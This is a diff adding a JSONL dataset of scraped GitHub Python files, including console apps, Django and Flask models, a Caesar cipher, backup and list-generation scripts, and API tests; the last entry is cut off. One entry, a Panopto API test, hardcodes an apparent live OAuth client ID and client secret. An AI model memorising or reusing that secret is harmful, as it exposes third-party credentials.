diff --git "a/3073.jsonl" "b/3073.jsonl" new file mode 100644--- /dev/null +++ "b/3073.jsonl" @@ -0,0 +1,263 @@ +{"seq_id":"22900828070","text":"from absl import app\nfrom absl import flags\nfrom icubam import config\nfrom icubam.db import migrator\nimport click\n\nflags.DEFINE_string(\"config\", config.DEFAULT_CONFIG_PATH, \"Config file.\")\nflags.DEFINE_string(\"dotenv_path\", config.DEFAULT_DOTENV_PATH, \"Config file.\")\nFLAGS = flags.FLAGS\n\n\ndef main(unused_argv):\n cfg = config.Config(FLAGS.config, env_path=FLAGS.dotenv_path)\n mgt = migrator.Migrator(cfg)\n if not click.confirm(\n \"WARNING: THIS WILL UPDATE THE DATABASE IN-PLACE. CONTINUE?\", err=True\n ):\n return\n else:\n mgt.run()\n\n\nif __name__ == \"__main__\":\n app.run(main)\n","repo_name":"icubam/icubam","sub_path":"scripts/migrate_db.py","file_name":"migrate_db.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"98"} +{"seq_id":"35408190197","text":"\nimport time\nimport uuid\nfrom pprint import pprint\n\nfrom db import DB\n\ndb = DB()\ndb.connect_to_project(\"DB/projects.json\")\n\nclass Project:\n def __init__(self, user_loggedIn) -> None:\n self.user_id = user_loggedIn['user_id']\n\n def create(self):\n self.title = input(\"Title : \")\n while not self.title.isalpha() or not self.title:\n self.title = input(\" Enter valid Title : 😅\") \n self.details = input(\"Details: \")\n while not self.details.isalpha() or not self.details:\n self.details = input(\"Enter valid Details: 😅\")\n self.total_target = input(\"Total target $ : \")\n while self.total_target.isalpha() or not self.total_target:\n self.total_target = input(\"Enter valid Total target $ : 😅\")\n self.start_time = input(\"Start Date (mm/dd/yyyy) : \")\n self.end_time = input(\"End Date (mm/dd/yyyy) : \") \n \n try : \n start_date_format = time.strptime(self.start_time, '%m/%d/%Y')\n end_date_format = time.strptime(self.end_time, '%m/%d/%Y') \n \n if start_date_format and end_date_format:\n \n project_data = {\n \"id\": int(uuid.uuid1()),\n \"title\": self.title,\n \"details\": self.details,\n \"total_target\": self.total_target,\n \"start_time\": self.start_time,\n \"end_time\": self.end_time,\n \"user_id\": self.user_id\n } \n data = db.get_project_data()\n data.append(project_data)\n db.set_project_data(data)\n\n print('\\n\\n Your project is created successfully 👏 \\n')\n else :\n print(\"\\n\\n Your date is invalid , please enter valid date 😅 :\\n\")\n except ValueError:\n print('\\n\\n Invalid Date! 😓 , Enter valid Date\\n')\n\n \n \n\n def view(self):\n data = db.get_project_data()\n if len(data) == 0 :\n print(\"\\n\\nyou don't have project 😱\\n\") \n else:\n for project in data:\n if self.user_id == project[\"user_id\"]:\n print(\"\\n\\n\",project)\n\n\n def edit(self):\n self.view()\n try :\n project_title = input(\"\\n\\n Enter Project Title: \")\n data = db.get_project_data()\n\n if len(data) == 0 and self.user_id != project[\"user_id\"] :\n print(\"\\n\\nyou don't have project 😱\\n\") \n else:\n for index, project in enumerate(data):\n if self.user_id == project[\"user_id\"] and project_title == project['title']:\n while True:\n menu = '''\n ******************** 💻 Edit projects 💻 ************************* \n 1) Edit Title \n 2) Edit Details\n 3) Edit Total Target\n 4) Edit Start Date\n 5) Edit End Date\n 6) Return back to project menu 🏃\n '''\n print(menu)\n try:\n option = int(input('\\n\\n Enter your choice: 🤠 '))\n except:\n ('\\n\\n Invalid Option 😰.')\n\n if option == 1:\n title = input(\"Enter Title: \")\n while not title.isalpha() or not title:\n title = input(\" Enter valid Title : 😅\")\n data[index]['title'] = title\n elif option == 2:\n details = input(\"Enter Details: \")\n while not details.isalpha() or not details:\n details = input(\" Enter valid Details : 😅\")\n data[index]['details'] = details\n elif option == 3:\n total_target = input(\"Enter Total Target: \")\n while total_target.isalpha() or not total_target:\n total_target = input(\"Enter valid Total target $ : 😅\")\n data[index][\"total_target\"] = total_target\n elif option == 4:\n start_time = input(\"Enter Start Date: \")\n try : \n start_date_format = time.strptime(start_time, '%m/%d/%Y') \n if start_date_format :\n data[index][\"start_time\"] = start_time\n else :\n print(\"\\n\\n Your date is invalid , please enter valid date 😅 :\\n\")\n except ValueError:\n print('\\n\\n Invalid Date! 😓 , Enter valid Date\\n')\n elif option == 5 :\n end_time = input(\"Enter End Date: \")\n try : \n start_date_format = time.strptime(end_time, '%m/%d/%Y') \n if start_date_format :\n data[index][\"end_time\"] = end_time\n else :\n print(\"\\n\\n Your date is invalid , please enter valid date 😅 :\\n\")\n except ValueError:\n print('\\n\\n Invalid Date! 😓 , Enter valid Date\\n')\n \n elif option == 6:\n break\n else:\n print('\\n\\n Invalid option 😰 . Please choose a valid one.\\n') \n db.set_project_data(data)\n else:\n print(\"\\n\\n this project name isn't exist 😱 , please try again\")\n except ValueError:\n print('\\n\\n Invalid date ! 😅')\n \n \n \n def delete(self):\n self.view()\n try :\n project_title = input(\"Enter Project Title: \")\n data = db.get_project_data()\n data_original_length = len(data)\n\n for index, project in enumerate(data):\n if self.user_id == project['user_id'] and project_title == project['title']:\n data.pop(index)\n\n if(len(data) != data_original_length):\n db.set_project_data(data)\n print(\"\\n\\n delete project successfully 👏 \\n\")\n else:\n print(\"\\n\\n this project name isn't exist 😱 please try again \\n\")\n except ValueError:\n print('\\n\\n Invalid data ! 😅')\n\n\n \n def search(self):\n self.view()\n data = db.get_project_data()\n if len(data) == 0 :\n print(\"\\n\\nyou don't have project 😱\\n\") \n else:\n date = input(\"\\n\\n Enter Date \")\n\n found = False\n for project in data:\n if (date == project['start_time'] or date == project['end_time']) and self.user_id == project['user_id']:\n found = True\n print(project)\n print(\"\\n\")\n\n if not found:\n print(\"\\n\\n Not Found!😢😢 !! you don't have project with this date 😱 \")\n\n\n \n\n","repo_name":"NermeenShehab/Crowd-Funding-console-app","sub_path":"console_app/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":7792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"98"} +{"seq_id":"3359210120","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nx1 = []\nx2 = []\ny = []\nwith open('./hw1data.dat') as f:\n\tline = f.readline()\n\tlst = line.split(\" \")\n\tdata_size = int(lst[0])\n\tinput_num = int(lst[1])\n\toutput_num = int(lst[2])\n\tfor x in range(data_size):\n\t\tlst = f.readline().split(\"\\t\")\n\t\tx1.append(float(lst[0]))\n\t\tx2.append(float(lst[1]))\n\t\ty.append(float(lst[2]))\n\ncolor= ['red' if l == 1 else 'green' for l in y]\nplt.scatter(x1, x2, color=color)\nplt.show()","repo_name":"alan4chen/NTU_Neural-Network-HW","sub_path":"NN_hw1/Plot_hw1data.py","file_name":"Plot_hw1data.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"8673447686","text":"from __future__ import unicode_literals\n\nfrom django.db import models\nfrom intersections.models import Intersection\nfrom paths.models import Path\nfrom terrains.models import Terrain\n\n# Create your models here.\nclass Board(models.Model):\n id = models.AutoField(primary_key=True)\n\n @classmethod\n def create(cls):\n board = cls()\n board.save()\n for i in range(54):\n Intersection.objects.create(board_id=board.id)\n\n for i in range(70):\n Path.objects.create(board_id=board.id)\n\n for i in range(19):\n Terrain.objects.create(board_id=board.id)\n\n return board\n","repo_name":"evanpthompson/catan-api","sub_path":"catan_api/boards/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"31945102983","text":"import os\nimport click\nfrom flask_babel import _\nfrom time import strftime\nfrom ..app import app, conf\nfrom gdds.app.api.common.db_connection import connect\n\n\n# noinspection SqlDialectInspection,SqlNoDataSourceInspection,PyPep8Naming\n@click.command()\ndef generate():\n \"\"\"Creating Black-List & Pairing-List from Duplication_list Table.\"\"\"\n\n try:\n DOWNLOAD_PATH = conf['GDDS_Lists']\n con = connect()\n cur = con.cursor()\n\n cur.execute(\"\"\"SELECT imei FROM duplication_list WHERE imei_status IS FALSE \"\"\")\n imei_list = set([l[0] for l in cur.fetchall()])\n\n if imei_list:\n black_list = \"Black-List_\" + strftime(\"%Y-%m-%d_%H-%M-%S\") + '.csv'\n bl_path = os.path.join(DOWNLOAD_PATH, black_list)\n\n with open(bl_path, 'w') as bl:\n bl.write('imei,reason\\n')\n for imei in imei_list:\n bl.write(imei + ',duplicated\\n')\n # bl.write(\",duplicated\\n\".join(imei_list))\n\n bl.close()\n\n pair_list = \"Pair-List_\" + strftime(\"%Y-%m-%d_%H-%M-%S\") + '.csv'\n pl_path = os.path.join(DOWNLOAD_PATH, pair_list)\n\n if conf['pair_list_triplet']: params = \"imei,imsi,msisdn\"\n else: params = \"imei,imsi\"\n\n cur.execute(\"\"\"SELECT {p} FROM duplication_list WHERE imei_status IS TRUE \"\"\".format(p=params))\n pairs = cur.fetchall()\n\n with open(pl_path, 'w') as file:\n file.write(params + '\\n')\n for row in pairs:\n if conf['pair_list_triplet']:\n file.write(row[0] + ',' + row[1] + ',' + row[2] + '\\n')\n else:\n file.write(row[0] + ',' + row[1] + '\\n')\n\n file.close()\n\n print(\"Files successfully created\")\n\n return\n\n except Exception as e:\n app.logger.info(_(\"Error occurred creating Lists.\"))\n app.logger.exception(e)\n","repo_name":"munawwaranwar/Genuine-Device-Detection-Subsystem","sub_path":"src/gdds/cli/generate_lists.py","file_name":"generate_lists.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"10290368958","text":"#!python3\nimport argparse\nfrom UploadAndAuthentificationPanopto_Algo.panopto_oauth2 import PanoptoOAuth2\nimport requests\nimport os\n\ndef parse_argument():\n '''\n Argument definition and handling.\n '''\n parser = argparse.ArgumentParser(description='Upload a single video file to Panopto server')\n #parser.add_argument('--server', dest='server', required=True, help='Server name as FQDN')\n #parser.add_argument('--folder-id', dest='folder_id', required=True, help='ID of target Panopto folder')\n # parser.add_argument('--upload-file', dest='upload_file', required=True, help='File to be uploaded')\n # parser.add_argument('--client-id', dest='client_id', required=True, help='Client ID of OAuth2 client')\n # parser.add_argument('--client-secret', dest='client_secret', required=True, help='Client Secret of OAuth2 client')\n parser.add_argument('--skip-verify', dest='skip_verify', action='store_true', required=False,\n help='Skip SSL certificate verification. (Never apply to the production code)')\n\n return parser.parse_args()\n\n\ndef main():\n '''\n Main method\n '''\n args = parse_argument()\n \n #if args.skip_verify:\n# # This line is needed to suppress annoying warning message.\n# urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n client_id = '5aff5849-cfaa-4176-8a79-af82009b4df3'\n \n client_secret = 'R9d8ao5bM+BjWWpzcANElnVUZz3jP1ixH4OUHOpn5c0='\n\n \n oauth2 = PanoptoOAuth2('test-tu-darmstadt.cloud.panopto.eu', client_id, client_secret, not args.skip_verify)\n \n requests_session = requests.Session()\n access_token = oauth2.get_access_token_authorization_code_grant()\n #Beispiel Anfragen\n # requests_session.headers.update({'Authorization': 'Bearer ' + access_token})\n # response = requests.get('http://test-tu-darmstadt.cloud.panopto.eu/Panopto/api/v1/auth/legacyLogin')\n # response = requests_session.get('https://test-tu-darmstadt.cloud.panopto.eu/Panopto/api/v1/folders/e7a1b480-5ec7-438b-a484-af5f00a442cc/sessions')\n # payload = {'Name': 'AutomatedPlaylist', 'Description': 'Automatisch erstellte Playlist', 'FolderId': 'e7a1b480-5ec7-438b-a484-af5f00a442cc', \n # 'Sessions': ['ae963742-025e-4396-9983-af5f00a44823']\n # }\n # response = requests_session.post('https://test-tu-darmstadt.cloud.panopto.eu/Panopto/api/v1/playlists', json=payload)\n response = requests_session.get(\"https://test-tu-darmstadt.cloud.panopto.eu/Panopto/api/v1/sessions/b8c3f739-71c6-410a-adc7-af8d00bcd41a\")\n print(response.json())\n\n #############################################################\n\n #mainFolderPath = 'C:/Users/Abdulhaq/.spyder-py3/FachbereichsOrdner' \n directory = 'C:/Users/Abdulhaq/.spyder-py3/FachbereichsOrdner'\n for filename in os.listdir(directory):\n f = os.path.join(directory, filename)\n # checking if it is a file\n #if os.path.isdir(f):\n \n \n\n if __name__ == '__main__':\n main()\n \ndef createFolder (file_path):\n print(\"Test\")\n ","repo_name":"AbdiProg/panoptoAutomatedUpload","sub_path":"Testskripte/apiTest.py","file_name":"apiTest.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"73422742401","text":"from flask_wtf import FlaskForm\nfrom wtforms import fields, validators\nfrom .fields import TagListField, TextListField\n\nfrom flask_mongoengine.wtf import model_form\nfrom kampan import models\n\nBaseItemPositionForm = model_form(\n models.ItemPosition,\n FlaskForm,\n exclude=[\n \"created_date\",\n \"updated_date\",\n \"user\",\n ],\n field_args={\n \"warehouse\": {\"label\": \"คลังอุปกรณ์\", \"label_modifier\": lambda w: w.name},\n \"description\": {\"label\": \"คำอธิบาย\"},\n \"rack\": {\"label\": \"ชั้นวาง\"},\n \"row\": {\"label\": \"แถว\"},\n \"locker\": {\"label\": \"ตู้เก็บของ\"},\n },\n)\n\n\nclass ItemPositionForm(BaseItemPositionForm):\n pass\n","repo_name":"r202-coe-psu/kampan","sub_path":"kampan/web/forms/item_positions.py","file_name":"item_positions.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"98"} +{"seq_id":"28150672419","text":"import unittest\nfrom parameterized import parameterized\n\nimport phototool\n\n\nclass PhotoDuplicates(unittest.TestCase):\n \n @parameterized.expand([\n [[1,2,3,10], [[1,2,3],[10]]]\n ])\n def test_find_duplicates(self, input, exp_output):\n hashes = {k:[None] for k in input}\n exp_groups = {tuple(k):[None]*len(k) for k in exp_output}\n actual_groups = phototool.find_duplicates(hashes)\n self.assertDictEqual(exp_groups, actual_groups)\n \n @parameterized.expand([\n [[1,2,3],[[0,1,2],[1,0,1],[2,1,0]]]\n ])\n def test_compute_hamming_distance(self, input, exp_output):\n actual = phototool.compute_hamming_distance(input)\n self.assertEqual(exp_output, actual)\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"nikulabs/photo-duplicates","sub_path":"tests/test_photoduplicates.py","file_name":"test_photoduplicates.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"21758863893","text":"# Allissa\n# Hertz\n# Oct. 6\n# Description: Lab 6. Caeser cipher\n\ndef main():\n\n word_to_cipher = input(\"Input a word to cipher: \")\n number_for_cipher = input(\"Input a number: \")\n\n # create an empty list for the ciphered and deciphered letters\n ciphered_word = []\n deciphered_word = []\n \n # loop through the word the user put in\n for ch in word_to_cipher:\n # find the ord value of each character, add the number the user put in and turn it\n # back into a character\n c = chr(ord(ch) + int(number_for_cipher))\n # find the ord value of each character, subtract the number the user put in and turn it\n # back into a character\n d = chr(ord(c) - int(number_for_cipher))\n # add each ciphered/deciphered character to the empty list\n ciphered_word.append(c)\n deciphered_word.append(d)\n\n # Print \"The encode/decode message is\" along with all the letters in the ciphered/deciphered\n # list joined together with no characters/spaces\n print(\"The encoded message is:\", \"\".join(ciphered_word))\n print(\"The decoded message is:\", \"\".join(deciphered_word))\n\nmain()\n","repo_name":"simplyallissa/Python","sub_path":"HertzAllissaLab06b.py","file_name":"HertzAllissaLab06b.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"42808729856","text":"import os\nfrom pathlib import Path\nimport platform\n\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtWidgets import QWidget, QGridLayout, QMainWindow, QApplication, QLabel, QLineEdit, QTextEdit, QPushButton\n\nfrom src.util.zviutil import getResource\nfrom src.constants.zviconstants import constants\n\n\nclass ZVIReportBug(QMainWindow):\n def __init__(self, emailManager, parent=None):\n super().__init__(parent)\n self.emailManager = emailManager\n self.build()\n\n def build(self):\n widget = QWidget()\n layout = QGridLayout(widget)\n uLabel = QLabel(\"Username:\")\n uLabel.setMaximumWidth(70)\n layout.addWidget(uLabel, 0, 0, 1, 1)\n self.username = QLineEdit()\n self.username.setMaximumWidth(150)\n self.username.setDisabled(True)\n layout.addWidget(self.username, 0, 1, 1, 2)\n sLabel = QLabel(\"System:\")\n sLabel.setMaximumWidth(70)\n layout.addWidget(sLabel, 1, 0, 1, 1)\n system = QLineEdit()\n system.setMaximumWidth(150)\n self.systemName = platform.system() + \" \" + platform.version()\n system.setText(self.systemName)\n system.setDisabled(True)\n layout.addWidget(system, 1, 1, 1, 2)\n layout.addWidget(QLabel(\"Description:\"), 2, 0, 1, 1)\n self.bugDescription = QTextEdit()\n layout.addWidget(self.bugDescription, 3, 0, 1, 3)\n self.submit = QPushButton(\"Submit\")\n self.submit.clicked.connect(self.submitBug)\n layout.addWidget(self.submit, 4, 0, 1, 3)\n self.setCentralWidget(widget)\n self.setWindowIcon(QIcon(getResource(\"report-bug.ico\")))\n self.setWindowTitle(\"Report Bug\")\n self.setObjectName(\"Report A Bug\")\n self.setMinimumSize(300, 200)\n self.resize(300, 200)\n\n def setUsername(self, username):\n self.username.setText(username)\n\n def submitBug(self):\n self.emailManager.sendEmail(\"drees@zahroofvalves.com\",\n \"ZVIApp Report Bug - User: {0}, {1}\".format(self.username.text(), self.systemName),\n self.bugDescription.toPlainText(),\n os.path.join(constants.path[\"Local\"], Path(constants.logger.handlers[0].baseFilename).name))\n self.bugDescription.clear()\n self.close()\n\n def closeEvent(self, event):\n self.bugDescription.clear()\n event.accept()\n\nif __name__ == \"__main__\":\n import sys\n\n app = QApplication(sys.argv)\n w = ZVIReportBug(None)\n w.show()\n sys.exit(app.exec_())","repo_name":"David52920/zviapp","sub_path":"src/common/windows/report/zvireportbug.py","file_name":"zvireportbug.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"4113168623","text":"# Evalute the value fo arithmetic expression in reverse polish notation.\r\n# ex : [2,1,+,3,*] = 9\r\ndef evalute_expression(arr):\r\n length = len(arr) # store the length of the array\r\n stack = [] # stack to store the operands\r\n operators = ['+','-','*','/']\r\n # traverse the arr\r\n for i in range(0,len(arr)):\r\n cur_ele = arr[i]\r\n # if the current element is operator , and we will evalute using the top two element in the stack\r\n if cur_ele in operators:\r\n value1 = stack.pop()\r\n value2 = stack.pop()\r\n value1 = int(value1)\r\n value2 = int(value2)\r\n if cur_ele == '+':\r\n stack.append(value1 + value2)\r\n elif cur_ele == '-':\r\n stack.append(value1 - value2)\r\n elif cur_ele == '*':\r\n stack.append(value1 * value2)\r\n elif cur_ele == '/':\r\n stack.append(value1 // value2)\r\n else: # if the current element is operand\r\n stack.append(cur_ele)\r\n return stack[-1]\r\n\r\n# test case\r\narr = ['2','1','+','3','*']\r\nans = evalute_expression(arr)\r\nprint(ans)","repo_name":"Ranjit007ai/InterviewBit-Stack_and_queue","sub_path":"stack_and_queues/evalute_expression/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"25472392711","text":"import requests\nimport json\nimport ast\nimport datetime\nfrom datetime import timedelta\n\n#Give token\ntoken = \"Your given token\"\n\n#Empty string\ndatestamp = \"\"\n\ndata = { 'token' : token , 'datestamp' : datestamp}\nreq = requests.post(\"http://challenge.code2040.org/api/dating\", json = data)\n\nnewreq = req.json()\n\n#Took the two different key in the json dict into different variables\ninterval = newreq['interval']\ndatestamp = newreq['datestamp']\n\nprint(datestamp)\n\n#Made datestamp(a string data type) into datetime data type\ndatestamp = datetime.datetime.strptime(datestamp, \"%Y-%m-%dT%H:%M:%SZ\")\n\n#Made interval into datetime data type and added it to datestamp\ninter = datetime.timedelta(seconds = interval) + datestamp\ninter = inter.isoformat() + 'Z' #added missing Z to the iso8601 format\n\nprint(inter)\n\ndata['datestamp'] = inter\n\nreq = requests.post(\"http://challenge.code2040.org/api/dating/validate\",json = data)\nprint(req.content)\n","repo_name":"Sandra-Flores/Code2040","sub_path":"dating.py","file_name":"dating.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"34710248180","text":"import pygame\n\nfrom configuraciones import Configuraciones\n\nimport funciones_juego as fj\n\nfrom asesino_protagonista import Asesino\n\nfrom plataforma_tierra import Plataforma_de_tierra\n\nfrom pantalla import Pantalla\n\nfrom proyectil_asesino import Proyectil_asesino\n\ndef run_game():\n \"\"\"Inicia el juego y crea un objeto pantalla\"\"\"\n\n pygame.init()\n configs = Configuraciones()\n pantalla = pygame.display.set_mode((configs.pantalla_ancho, configs.pantalla_alto))\n pygame.display.set_caption(\"Juego1\")\n pantalla_fondo = Pantalla()\n clock = pygame.time.Clock()\n\n # Crea al personaje asesino\n plataforma1 = Plataforma_de_tierra(pantalla, 130, 350)\n plataforma2 = Plataforma_de_tierra(pantalla, 300, 700)\n plataforma3 = Plataforma_de_tierra(pantalla, 400, 650)\n asesino = Asesino(configs, pantalla, plataforma1, plataforma2, plataforma3)\n\n # Crea un grupo para almacenar las plataformas\n Plataformas = (plataforma1, plataforma2, plataforma3)\n\n while True:\n fj.verificar_eventos(asesino, plataforma1, plataforma2, plataforma3, pantalla_fondo)\n fj.pantalla_inicial(pantalla)\n if pantalla_fondo.cambio_fondo == True:\n while True:\n fj.verificar_eventos(asesino, plataforma1, plataforma2, plataforma3, pantalla_fondo)\n asesino.update()\n fj.actualizar_pantalla(pantalla, asesino, plataforma1, plataforma2, plataforma3)\n clock.tick(10)\n print(asesino.direccion_asesino)\n\nrun_game()\n","repo_name":"lobo23j/mi_juego1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"98"} +{"seq_id":"10438440079","text":"import json\nimport logging\nimport requests\nfrom typing import Any, Dict\nfrom os import environ\n\nimport boto3\nfrom bs4 import BeautifulSoup\n\nLOG_LEVEL = int(environ['LOG_LEVEL'])\nQUERY_WIKIDATA_LAMBDA = environ['QUERY_WIKIDATA_LAMBDA']\n\nlogging.basicConfig()\nlogger = logging.getLogger('extract_wikipedia_link')\nlogger.setLevel(LOG_LEVEL)\n\nclient = boto3.client('lambda')\n\n\ndef handler(event: Dict[str, Any], _):\n try:\n url = event['wikipedia_link']\n author = event['author']\n book_id = event['book_id']\n logger.info(f'Scraping wikidata ID for URL {url}.')\n page = requests.get(url)\n soup = BeautifulSoup(page.content, \"html.parser\")\n wikidata_item = soup.find(id='t-wikibase').find('a', href=True)\n wikidata_id = str(wikidata_item['href']).split('/')[-1]\n logger.info(f'Found ID: {wikidata_id}.')\n\n client.invoke(\n FunctionName=QUERY_WIKIDATA_LAMBDA,\n InvocationType='Event',\n Payload=json.dumps({\n 'wikidata_id': wikidata_id,\n 'wikipedia_link': url,\n 'book_id': book_id,\n 'author': author,\n }),\n )\n\n return {'statusCode': 200, 'body': json.dumps({'wikidata_id': wikidata_id})}\n except KeyError as ex:\n logger.error(ex)\n return {'statusCode': 400, 'error': str(ex)}\n except Exception as ex:\n logger.error(ex)\n return {'statusCode': 500, 'error': str(ex)}\n","repo_name":"askamander/TASS_project","sub_path":"scrapers/lambda/wikipedia_scraper/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"24259627725","text":"from flask.ext.principal import RoleNeed, UserNeed\nfrom flask.ext.login import UserMixin, current_user\nfrom werkzeug.utils import cached_property\n\nclass UserAuth(UserMixin):\n\n USER = 50\n ADMIN = 100\n MANAGER = 200\n ROOT = 300\n\n def __init__(self, result):\n if not result:\n return None\n self.id = result['id']\n self.username = result['username']\n self.password = result['password']\n self.displayname = result['displayname']\n self.email = result['email']\n self.organisation_id = result['organisation_id']\n self.organisation_name = result['organisation_name']\n self.organisation_domain = result['organisation_domain']\n self.role = result['role']\n self.active = result['active']\n self.language = result['language']\n self.created_time = result['created_time']\n self.backend = result['backend']\n\n def from_identity(self, identity):\n if identity.id == current_user.id:\n identity.provides.update(self.provides)\n identity.user = current_user\n identity.auth_type = self.backend\n else:\n identity.auth_type = \"\"\n\n @cached_property\n def provides(self):\n needs = [RoleNeed('authenticated'), UserNeed(current_user.id)]\n\n if self.is_user:\n needs.append(RoleNeed('user'))\n\n if self.is_admin:\n needs.append(RoleNeed('admin'))\n\n if self.is_manager:\n needs.append(RoleNeed('manager'))\n\n if self.is_root:\n needs.append(RoleNeed('root'))\n\n return needs\n\n @property\n def is_user(self):\n return self.role == self.USER\n\n @property\n def is_admin(self):\n return self.role == self.ADMIN\n\n @property\n def is_manager(self):\n return self.role == self.MANAGER\n\n @property\n def is_root(self):\n return self.role == self.ROOT\n\n def __repr__(self):\n return \"<%d : %s (%s)>\" % (self.id, self.username, self.email)\n","repo_name":"sboily/xivo-unified","sub_path":"app/core/authentification/modules/auth_base.py","file_name":"auth_base.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"72586804162","text":"import os\nimport shutil\nimport time\nimport re\n\n\ndef backup(backup_count: int, backup_dir: str, source_file: str) -> None:\n\n # Setup\n database = os.path.basename(source_file)\n filename, ext = os.path.splitext(database)\n\n # Copy file with timestamp\n now = time.time()\n timestamp_name = f\"{filename}-{str(int(now))}{ext}\"\n shutil.copy(source_file, backup_dir)\n os.rename(os.path.join(backup_dir, database), os.path.join(backup_dir, timestamp_name))\n\n # Remove old backups\n regex_str = r\"{}-\\d*{}\".format(filename, ext)\n backup_files = [name for name in os.listdir(backup_dir) if re.search(regex_str, name)] \n\n for i in range(len(backup_files) - backup_count):\n os.remove(os.path.join(backup_dir, backup_files[i]))\n","repo_name":"EdvinAlvarado/File-Backup","sub_path":"python-backup/backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"98"} +{"seq_id":"14376008255","text":"class Solution:\n def backtracking(self, tickets, path, t_dict):\n if len(path) == len(tickets) + 1:\n return True\n start = path[-1]\n t_dict[start].sort()\n for _ in t_dict[start]:\n t = t_dict[start].pop(0)\n path.append(t)\n if self.backtracking(tickets, path, t_dict):\n return True\n path.pop()\n t_dict[start].append(t)\n\n def findItinerary(self, tickets: List[List[str]]) -> List[str]:\n path = ['JFK']\n t_dict = defaultdict(list)\n for t in tickets:\n t_dict[t[0]].append(t[1])\n self.backtracking(tickets, path, t_dict)\n return path","repo_name":"1asso/LeetCode","sub_path":"0332. Reconstruct Itinerary.py","file_name":"0332. Reconstruct Itinerary.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"98"} +{"seq_id":"24077910201","text":"import sys\nfrom collections import deque\n\nm, n = map(int, sys.stdin.readline().split())\nbox=[]\ndx=[-1,1,0,0]\ndy=[0,0,-1,1]\nfor _ in range(n):\n t=list(map(int, sys.stdin.readline().split()))\n box.append(t)\nresult=0\nqueue=deque()\n# 좌표들을 queue에 넣어줌\nfor i in range(n):\n for j in range(m):\n if box[i][j]==1:\n queue.append([i,j])\n\ndef bfs():\n while queue:\n x, y = queue.popleft()\n for i in range(4):\n nx, ny = x+dx[i], y+dy[i]\n # 영역안에 있고, 그 좌표에 토마토가 익지않은 상태로 있는 경우에 +1해주기\n if 0<= nx< n and 0<=ny their weightedIntersection IFBucket.\"\n L = [(x, wx) for (x, wx) in L if x is not None]\n if len(L) < 2:\n return _trivial(L, family)\n # Intersect with smallest first. We expect the input maps to be\n # IFBuckets, so it doesn't hurt to get their lengths repeatedly\n # (len(Bucket) is fast; len(BTree) is slow).\n L = sorted(L, key=lambda x: len(x[0]))\n (x, wx), (y, wy) = L[:2]\n dummy, result = family.IF.weightedIntersection(x, y, wx, wy)\n for x, wx in L[2:]:\n dummy, result = family.IF.weightedIntersection(result, x, 1, wx)\n return result\n\ndef mass_weightedUnion(L, family=BTrees.family64):\n \"A list of (mapping, weight) pairs -> their weightedUnion IFBucket.\"\n if len(L) < 2:\n return _trivial(L, family)\n # Balance unions as closely as possible, smallest to largest.\n merge = NBest(len(L))\n for x, weight in L:\n merge.add((x, weight), len(x))\n while len(merge) > 1:\n # Merge the two smallest so far, and add back to the queue.\n (x, wx), dummy = merge.pop_smallest()\n (y, wy), dummy = merge.pop_smallest()\n dummy, z = family.IF.weightedUnion(x, y, wx, wy)\n merge.add((z, 1), len(z))\n (result, weight), dummy = merge.pop_smallest()\n return result\n\ndef _trivial(L, family):\n # L is empty or has only one (mapping, weight) pair. If there is a\n # pair, we may still need to multiply the mapping by its weight.\n assert len(L) <= 1\n if len(L) == 0:\n return family.IF.Bucket()\n [(result, weight)] = L\n if weight != 1:\n dummy, result = family.IF.weightedUnion(\n family.IF.Bucket(), result, 0, weight)\n return result\n","repo_name":"Pylons/hypatia","sub_path":"hypatia/text/setops.py","file_name":"setops.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"98"} +{"seq_id":"39995713508","text":"import flask\nfrom cached_property import cached_property\nfrom flask import views\nimport werkzeug.exceptions\n\nfrom dila import application\nfrom dila.frontend.flask import forms\nfrom dila.frontend.flask import languages\nfrom dila.frontend.flask import template_tools\nfrom dila.frontend.flask import user_tools\n\nblueprint = 